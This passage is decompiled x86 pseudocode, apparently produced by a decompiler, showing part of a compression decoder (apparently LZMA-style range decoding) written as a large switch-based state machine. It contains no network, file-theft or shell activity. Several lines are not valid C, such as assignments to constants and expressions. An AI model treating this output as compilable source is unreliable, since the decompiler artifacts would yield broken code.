                                                  												}
                                                  												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                  												_t67 = _t621 - 0x70;
                                                  												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                                                  												__eflags =  *_t67;
                                                  												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                  												L23:
                                                  												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                                                  												if( *(_t621 - 0x48) != 0) {
                                                  													goto L21;
                                                  												}
                                                  												goto L24;
                                                  											case 4:
                                                  												L133:
                                                  												_t540 =  *_t614;
                                                  												_t597 = _t540 & 0x0000ffff;
                                                  												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                  												if( *(_t621 - 0xc) >= _t573) {
                                                  													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                  													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                  													 *(_t621 - 0x40) = 1;
                                                  													_t541 = _t540 - (_t540 >> 5);
                                                  													 *_t614 = _t541;
                                                  												} else {
                                                  													 *(_t621 - 0x10) = _t573;
                                                  													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                  													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                  												}
                                                  												if( *(_t621 - 0x10) >= 0x1000000) {
                                                  													goto L139;
                                                  												}
                                                  											case 5:
                                                  												goto L137;
                                                  											case 6:
                                                  												__edx = 0;
                                                  												__eflags =  *(__ebp - 0x40);
                                                  												if( *(__ebp - 0x40) != 0) {
                                                  													__eax =  *(__ebp - 4);
                                                  													__ecx =  *(__ebp - 0x38);
                                                  													 *(__ebp - 0x34) = 1;
                                                  													 *(__ebp - 0x84) = 7;
                                                  													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                  													L132:
                                                  													 *(_t621 - 0x54) = _t614;
                                                  													goto L133;
                                                  												}
                                                  												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                  												__esi =  *(__ebp - 0x60);
                                                  												__cl = 8;
                                                  												__cl = 8 -  *(__ebp - 0x3c);
                                                  												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                  												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                  												__ecx =  *(__ebp - 0x3c);
                                                  												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                  												__ecx =  *(__ebp - 4);
                                                  												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                  												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                  												__eflags =  *(__ebp - 0x38) - 4;
                                                  												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                  												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                  												if( *(__ebp - 0x38) >= 4) {
                                                  													__eflags =  *(__ebp - 0x38) - 0xa;
                                                  													if( *(__ebp - 0x38) >= 0xa) {
                                                  														_t98 = __ebp - 0x38;
                                                  														 *_t98 =  *(__ebp - 0x38) - 6;
                                                  														__eflags =  *_t98;
                                                  													} else {
                                                  														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                  													}
                                                  												} else {
                                                  													 *(__ebp - 0x38) = 0;
                                                  												}
                                                  												__eflags =  *(__ebp - 0x34) - __edx;
                                                  												if( *(__ebp - 0x34) == __edx) {
                                                  													__ebx = 0;
                                                  													__ebx = 1;
                                                  													goto L61;
                                                  												} else {
                                                  													__eax =  *(__ebp - 0x14);
                                                  													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  													__eflags = __eax -  *(__ebp - 0x74);
                                                  													if(__eax >=  *(__ebp - 0x74)) {
                                                  														__eax = __eax +  *(__ebp - 0x74);
                                                  														__eflags = __eax;
                                                  													}
                                                  													__ecx =  *(__ebp - 8);
                                                  													__ebx = 0;
                                                  													__ebx = 1;
                                                  													__al =  *((intOrPtr*)(__eax + __ecx));
                                                  													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                  													goto L41;
                                                  												}
                                                  											case 7:
                                                  												goto L0;
                                                  											case 8:
                                                  												__eflags =  *(__ebp - 0x40);
                                                  												if( *(__ebp - 0x40) != 0) {
                                                  													__eax =  *(__ebp - 4);
                                                  													__ecx =  *(__ebp - 0x38);
                                                  													 *(__ebp - 0x84) = 0xa;
                                                  													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                  												} else {
                                                  													__eax =  *(__ebp - 0x38);
                                                  													__ecx =  *(__ebp - 4);
                                                  													__eax =  *(__ebp - 0x38) + 0xf;
                                                  													 *(__ebp - 0x84) = 9;
                                                  													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                  													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                  												}
                                                  												while(1) {
                                                  													L132:
                                                  													 *(_t621 - 0x54) = _t614;
                                                  													goto L133;
                                                  												}
                                                  											case 9:
                                                  												__eflags =  *(__ebp - 0x40);
                                                  												if( *(__ebp - 0x40) != 0) {
                                                  													goto L89;
                                                  												}
                                                  												__eflags =  *(__ebp - 0x60);
                                                  												if( *(__ebp - 0x60) == 0) {
                                                  													goto L171;
                                                  												}
                                                  												__eax = 0;
                                                  												__eflags =  *(__ebp - 0x38) - 7;
                                                  												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                  												__eflags = _t258;
                                                  												0 | _t258 = _t258 + _t258 + 9;
                                                  												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                  												goto L75;
                                                  											case 0xa:
                                                  												__eflags =  *(__ebp - 0x40);
                                                  												if( *(__ebp - 0x40) != 0) {
                                                  													__eax =  *(__ebp - 4);
                                                  													__ecx =  *(__ebp - 0x38);
                                                  													 *(__ebp - 0x84) = 0xb;
                                                  													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                  													while(1) {
                                                  														L132:
                                                  														 *(_t621 - 0x54) = _t614;
                                                  														goto L133;
                                                  													}
                                                  												}
                                                  												__eax =  *(__ebp - 0x28);
                                                  												goto L88;
                                                  											case 0xb:
                                                  												__eflags =  *(__ebp - 0x40);
                                                  												if( *(__ebp - 0x40) != 0) {
                                                  													__ecx =  *(__ebp - 0x24);
                                                  													__eax =  *(__ebp - 0x20);
                                                  													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                  												} else {
                                                  													__eax =  *(__ebp - 0x24);
                                                  												}
                                                  												__ecx =  *(__ebp - 0x28);
                                                  												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                  												L88:
                                                  												__ecx =  *(__ebp - 0x2c);
                                                  												 *(__ebp - 0x2c) = __eax;
                                                  												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                  												L89:
                                                  												__eax =  *(__ebp - 4);
                                                  												 *(__ebp - 0x80) = 0x15;
                                                  												__eax =  *(__ebp - 4) + 0xa68;
                                                  												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                  												goto L68;
                                                  											case 0xc:
                                                  												L99:
                                                  												__eflags =  *(__ebp - 0x6c);
                                                  												if( *(__ebp - 0x6c) == 0) {
                                                  													 *(__ebp - 0x88) = 0xc;
                                                  													goto L170;
                                                  												}
                                                  												__ecx =  *(__ebp - 0x70);
                                                  												__eax =  *(__ebp - 0xc);
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												_t334 = __ebp - 0x70;
                                                  												 *_t334 =  *(__ebp - 0x70) + 1;
                                                  												__eflags =  *_t334;
                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												__eax =  *(__ebp - 0x2c);
                                                  												goto L101;
                                                  											case 0xd:
                                                  												L37:
                                                  												__eflags =  *(__ebp - 0x6c);
                                                  												if( *(__ebp - 0x6c) == 0) {
                                                  													 *(__ebp - 0x88) = 0xd;
                                                  													goto L170;
                                                  												}
                                                  												__ecx =  *(__ebp - 0x70);
                                                  												__eax =  *(__ebp - 0xc);
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												_t122 = __ebp - 0x70;
                                                  												 *_t122 =  *(__ebp - 0x70) + 1;
                                                  												__eflags =  *_t122;
                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												L39:
                                                  												__eax =  *(__ebp - 0x40);
                                                  												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                  												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                  													goto L48;
                                                  												}
                                                  												__eflags = __ebx - 0x100;
                                                  												if(__ebx >= 0x100) {
                                                  													goto L54;
                                                  												}
                                                  												L41:
                                                  												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                  												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                  												__ecx =  *(__ebp - 0x58);
                                                  												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                  												 *(__ebp - 0x48) = __eax;
                                                  												__eax = __eax + 1;
                                                  												__eax = __eax << 8;
                                                  												__eax = __eax + __ebx;
                                                  												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                  												__ax =  *__esi;
                                                  												 *(__ebp - 0x54) = __esi;
                                                  												__edx = __ax & 0x0000ffff;
                                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                                  												if( *(__ebp - 0xc) >= __ecx) {
                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  													__cx = __ax;
                                                  													 *(__ebp - 0x40) = 1;
                                                  													__cx = __ax >> 5;
                                                  													__eflags = __eax;
                                                  													__ebx = __ebx + __ebx + 1;
                                                  													 *__esi = __ax;
                                                  												} else {
                                                  													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                  													 *(__ebp - 0x10) = __ecx;
                                                  													0x800 = 0x800 - __edx;
                                                  													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                  													__ebx = __ebx + __ebx;
                                                  													 *__esi = __cx;
                                                  												}
                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  												 *(__ebp - 0x44) = __ebx;
                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                  													goto L39;
                                                  												} else {
                                                  													goto L37;
                                                  												}
                                                  											case 0xe:
                                                  												L46:
                                                  												__eflags =  *(__ebp - 0x6c);
                                                  												if( *(__ebp - 0x6c) == 0) {
                                                  													 *(__ebp - 0x88) = 0xe;
                                                  													goto L170;
                                                  												}
                                                  												__ecx =  *(__ebp - 0x70);
                                                  												__eax =  *(__ebp - 0xc);
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												_t156 = __ebp - 0x70;
                                                  												 *_t156 =  *(__ebp - 0x70) + 1;
                                                  												__eflags =  *_t156;
                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												while(1) {
                                                  													L48:
                                                  													__eflags = __ebx - 0x100;
                                                  													if(__ebx >= 0x100) {
                                                  														break;
                                                  													}
                                                  													__eax =  *(__ebp - 0x58);
                                                  													__edx = __ebx + __ebx;
                                                  													__ecx =  *(__ebp - 0x10);
                                                  													__esi = __edx + __eax;
                                                  													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                  													__ax =  *__esi;
                                                  													 *(__ebp - 0x54) = __esi;
                                                  													__edi = __ax & 0x0000ffff;
                                                  													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                  													__eflags =  *(__ebp - 0xc) - __ecx;
                                                  													if( *(__ebp - 0xc) >= __ecx) {
                                                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  														__cx = __ax;
                                                  														_t170 = __edx + 1; // 0x1
                                                  														__ebx = _t170;
                                                  														__cx = __ax >> 5;
                                                  														__eflags = __eax;
                                                  														 *__esi = __ax;
                                                  													} else {
                                                  														 *(__ebp - 0x10) = __ecx;
                                                  														0x800 = 0x800 - __edi;
                                                  														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  														__ebx = __ebx + __ebx;
                                                  														 *__esi = __cx;
                                                  													}
                                                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  													 *(__ebp - 0x44) = __ebx;
                                                  													if( *(__ebp - 0x10) >= 0x1000000) {
                                                  														continue;
                                                  													} else {
                                                  														goto L46;
                                                  													}
                                                  												}
                                                  												L54:
                                                  												_t173 = __ebp - 0x34;
                                                  												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                  												__eflags =  *_t173;
                                                  												goto L55;
                                                  											case 0xf:
                                                  												L58:
                                                  												__eflags =  *(__ebp - 0x6c);
                                                  												if( *(__ebp - 0x6c) == 0) {
                                                  													 *(__ebp - 0x88) = 0xf;
                                                  													goto L170;
                                                  												}
                                                  												__ecx =  *(__ebp - 0x70);
                                                  												__eax =  *(__ebp - 0xc);
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												_t203 = __ebp - 0x70;
                                                  												 *_t203 =  *(__ebp - 0x70) + 1;
                                                  												__eflags =  *_t203;
                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												L60:
                                                  												__eflags = __ebx - 0x100;
                                                  												if(__ebx >= 0x100) {
                                                  													L55:
                                                  													__al =  *(__ebp - 0x44);
                                                  													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                  													goto L56;
                                                  												}
                                                  												L61:
                                                  												__eax =  *(__ebp - 0x58);
                                                  												__edx = __ebx + __ebx;
                                                  												__ecx =  *(__ebp - 0x10);
                                                  												__esi = __edx + __eax;
                                                  												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                  												__ax =  *__esi;
                                                  												 *(__ebp - 0x54) = __esi;
                                                  												__edi = __ax & 0x0000ffff;
                                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                                  												if( *(__ebp - 0xc) >= __ecx) {
                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  													__cx = __ax;
                                                  													_t217 = __edx + 1; // 0x1
                                                  													__ebx = _t217;
                                                  													__cx = __ax >> 5;
                                                  													__eflags = __eax;
                                                  													 *__esi = __ax;
                                                  												} else {
                                                  													 *(__ebp - 0x10) = __ecx;
                                                  													0x800 = 0x800 - __edi;
                                                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  													__ebx = __ebx + __ebx;
                                                  													 *__esi = __cx;
                                                  												}
                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  												 *(__ebp - 0x44) = __ebx;
                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                  													goto L60;
                                                  												} else {
                                                  													goto L58;
                                                  												}
                                                  											case 0x10:
                                                  												L109:
                                                  												__eflags =  *(__ebp - 0x6c);
                                                  												if( *(__ebp - 0x6c) == 0) {
                                                  													 *(__ebp - 0x88) = 0x10;
                                                  													goto L170;
                                                  												}
                                                  												__ecx =  *(__ebp - 0x70);
                                                  												__eax =  *(__ebp - 0xc);
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												_t365 = __ebp - 0x70;
                                                  												 *_t365 =  *(__ebp - 0x70) + 1;
                                                  												__eflags =  *_t365;
                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												goto L111;
                                                  											case 0x11:
                                                  												L68:
                                                  												_t614 =  *(_t621 - 0x58);
                                                  												 *(_t621 - 0x84) = 0x12;
                                                  												while(1) {
                                                  													L132:
                                                  													 *(_t621 - 0x54) = _t614;
                                                  													goto L133;
                                                  												}
                                                  											case 0x12:
                                                  												__eflags =  *(__ebp - 0x40);
                                                  												if( *(__ebp - 0x40) != 0) {
                                                  													__eax =  *(__ebp - 0x58);
                                                  													 *(__ebp - 0x84) = 0x13;
                                                  													__esi =  *(__ebp - 0x58) + 2;
                                                  													while(1) {
                                                  														L132:
                                                  														 *(_t621 - 0x54) = _t614;
                                                  														goto L133;
                                                  													}
                                                  												}
                                                  												__eax =  *(__ebp - 0x4c);
                                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                  												__ecx =  *(__ebp - 0x58);
                                                  												__eax =  *(__ebp - 0x4c) << 4;
                                                  												__eflags = __eax;
                                                  												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                  												goto L130;
                                                  											case 0x13:
                                                  												__eflags =  *(__ebp - 0x40);
                                                  												if( *(__ebp - 0x40) != 0) {
                                                  													_t469 = __ebp - 0x58;
                                                  													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                  													__eflags =  *_t469;
                                                  													 *(__ebp - 0x30) = 0x10;
                                                  													 *(__ebp - 0x40) = 8;
                                                  													L144:
                                                  													 *(__ebp - 0x7c) = 0x14;
                                                  													goto L145;
                                                  												}
                                                  												__eax =  *(__ebp - 0x4c);
                                                  												__ecx =  *(__ebp - 0x58);
                                                  												__eax =  *(__ebp - 0x4c) << 4;
                                                  												 *(__ebp - 0x30) = 8;
                                                  												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                  												L130:
                                                  												 *(__ebp - 0x58) = __eax;
                                                  												 *(__ebp - 0x40) = 3;
                                                  												goto L144;
                                                  											case 0x14:
                                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                  												__eax =  *(__ebp - 0x80);
                                                  												 *(_t621 - 0x88) = _t542;
                                                  												goto L1;
                                                  											case 0x15:
                                                  												__eax = 0;
                                                  												__eflags =  *(__ebp - 0x38) - 7;
                                                  												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                  												__al = __al & 0x000000fd;
                                                  												__eax = (__eflags >= 0) - 1 + 0xb;
                                                  												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                  												goto L120;
                                                  											case 0x16:
                                                  												__eax =  *(__ebp - 0x30);
                                                  												__eflags = __eax - 4;
                                                  												if(__eax >= 4) {
                                                  													_push(3);
                                                  													_pop(__eax);
                                                  												}
                                                  												__ecx =  *(__ebp - 4);
                                                  												 *(__ebp - 0x40) = 6;
                                                  												__eax = __eax << 7;
                                                  												 *(__ebp - 0x7c) = 0x19;
                                                  												 *(__ebp - 0x58) = __eax;
                                                  												goto L145;
                                                  											case 0x17:
                                                  												L145:
                                                  												__eax =  *(__ebp - 0x40);
                                                  												 *(__ebp - 0x50) = 1;
                                                  												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                  												goto L149;
                                                  											case 0x18:
                                                  												L146:
                                                  												__eflags =  *(__ebp - 0x6c);
                                                  												if( *(__ebp - 0x6c) == 0) {
                                                  													 *(__ebp - 0x88) = 0x18;
                                                  													goto L170;
                                                  												}
                                                  												__ecx =  *(__ebp - 0x70);
                                                  												__eax =  *(__ebp - 0xc);
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												_t484 = __ebp - 0x70;
                                                  												 *_t484 =  *(__ebp - 0x70) + 1;
                                                  												__eflags =  *_t484;
                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  												L148:
                                                  												_t487 = __ebp - 0x48;
                                                  												 *_t487 =  *(__ebp - 0x48) - 1;
                                                  												__eflags =  *_t487;
                                                  												L149:
                                                  												__eflags =  *(__ebp - 0x48);
                                                  												if( *(__ebp - 0x48) <= 0) {
                                                  													__ecx =  *(__ebp - 0x40);
                                                  													__ebx =  *(__ebp - 0x50);
                                                  													0 = 1;
                                                  													__eax = 1 << __cl;
                                                  													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                  													__eax =  *(__ebp - 0x7c);
                                                  													 *(__ebp - 0x44) = __ebx;
                                                  													while(1) {
                                                  														 *(_t621 - 0x88) = _t542;
                                                  														goto L1;
                                                  													}
                                                  												}
                                                  												__eax =  *(__ebp - 0x50);
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                  												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                  												__eax =  *(__ebp - 0x58);
                                                  												__esi = __edx + __eax;
                                                  												 *(__ebp - 0x54) = __esi;
                                                  												__ax =  *__esi;
                                                  												__edi = __ax & 0x0000ffff;
                                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                                  												if( *(__ebp - 0xc) >= __ecx) {
                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  													__cx = __ax;
                                                  													__cx = __ax >> 5;
                                                  													__eax = __eax - __ecx;
                                                  													__edx = __edx + 1;
                                                  													__eflags = __edx;
                                                  													 *__esi = __ax;
                                                  													 *(__ebp - 0x50) = __edx;
                                                  												} else {
                                                  													 *(__ebp - 0x10) = __ecx;
                                                  													0x800 = 0x800 - __edi;
                                                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                  													 *__esi = __cx;
                                                  												}
                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                  													goto L148;
                                                  												} else {
                                                  													goto L146;
                                                  												}
                                                  											case 0x19:
                                                  												__eflags = __ebx - 4;
                                                  												if(__ebx < 4) {
                                                  													 *(__ebp - 0x2c) = __ebx;
                                                  													L119:
                                                  													_t393 = __ebp - 0x2c;
                                                  													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                  													__eflags =  *_t393;
                                                  													L120:
                                                  													__eax =  *(__ebp - 0x2c);
                                                  													__eflags = __eax;
                                                  													if(__eax == 0) {
                                                  														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                  														goto L170;
                                                  													}
                                                  													__eflags = __eax -  *(__ebp - 0x60);
                                                  													if(__eax >  *(__ebp - 0x60)) {
                                                  														goto L171;
                                                  													}
                                                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                  													__eax =  *(__ebp - 0x30);
                                                  													_t400 = __ebp - 0x60;
                                                  													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                  													__eflags =  *_t400;
                                                  													goto L123;
                                                  												}
                                                  												__ecx = __ebx;
                                                  												__eax = __ebx;
                                                  												__ecx = __ebx >> 1;
                                                  												__eax = __ebx & 0x00000001;
                                                  												__ecx = (__ebx >> 1) - 1;
                                                  												__al = __al | 0x00000002;
                                                  												__eax = (__ebx & 0x00000001) << __cl;
                                                  												__eflags = __ebx - 0xe;
                                                  												 *(__ebp - 0x2c) = __eax;
                                                  												if(__ebx >= 0xe) {
                                                  													__ebx = 0;
                                                  													 *(__ebp - 0x48) = __ecx;
                                                  													L102:
                                                  													__eflags =  *(__ebp - 0x48);
                                                  													if( *(__ebp - 0x48) <= 0) {
                                                  														__eax = __eax + __ebx;
                                                  														 *(__ebp - 0x40) = 4;
                                                  														 *(__ebp - 0x2c) = __eax;
                                                  														__eax =  *(__ebp - 4);
                                                  														__eax =  *(__ebp - 4) + 0x644;
                                                  														__eflags = __eax;
                                                  														L108:
                                                  														__ebx = 0;
                                                  														 *(__ebp - 0x58) = __eax;
                                                  														 *(__ebp - 0x50) = 1;
                                                  														 *(__ebp - 0x44) = 0;
                                                  														 *(__ebp - 0x48) = 0;
                                                  														L112:
                                                  														__eax =  *(__ebp - 0x40);
                                                  														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                  														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                  															_t391 = __ebp - 0x2c;
                                                  															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                  															__eflags =  *_t391;
                                                  															goto L119;
                                                  														}
                                                  														__eax =  *(__ebp - 0x50);
                                                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                  														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                  														__eax =  *(__ebp - 0x58);
                                                  														__esi = __edi + __eax;
                                                  														 *(__ebp - 0x54) = __esi;
                                                  														__ax =  *__esi;
                                                  														__ecx = __ax & 0x0000ffff;
                                                  														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                  														__eflags =  *(__ebp - 0xc) - __edx;
                                                  														if( *(__ebp - 0xc) >= __edx) {
                                                  															__ecx = 0;
                                                  															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                  															__ecx = 1;
                                                  															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                  															__ebx = 1;
                                                  															__ecx =  *(__ebp - 0x48);
                                                  															__ebx = 1 << __cl;
                                                  															__ecx = 1 << __cl;
                                                  															__ebx =  *(__ebp - 0x44);
                                                  															__ebx =  *(__ebp - 0x44) | __ecx;
                                                  															__cx = __ax;
                                                  															__cx = __ax >> 5;
                                                  															__eax = __eax - __ecx;
                                                  															__edi = __edi + 1;
                                                  															__eflags = __edi;
                                                  															 *(__ebp - 0x44) = __ebx;
                                                  															 *__esi = __ax;
                                                  															 *(__ebp - 0x50) = __edi;
                                                  														} else {
                                                  															 *(__ebp - 0x10) = __edx;
                                                  															0x800 = 0x800 - __ecx;
                                                  															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                  															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                  															 *__esi = __dx;
                                                  														}
                                                  														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  														if( *(__ebp - 0x10) >= 0x1000000) {
                                                  															L111:
                                                  															_t368 = __ebp - 0x48;
                                                  															 *_t368 =  *(__ebp - 0x48) + 1;
                                                  															__eflags =  *_t368;
                                                  															goto L112;
                                                  														} else {
                                                  															goto L109;
                                                  														}
                                                  													}
                                                  													__ecx =  *(__ebp - 0xc);
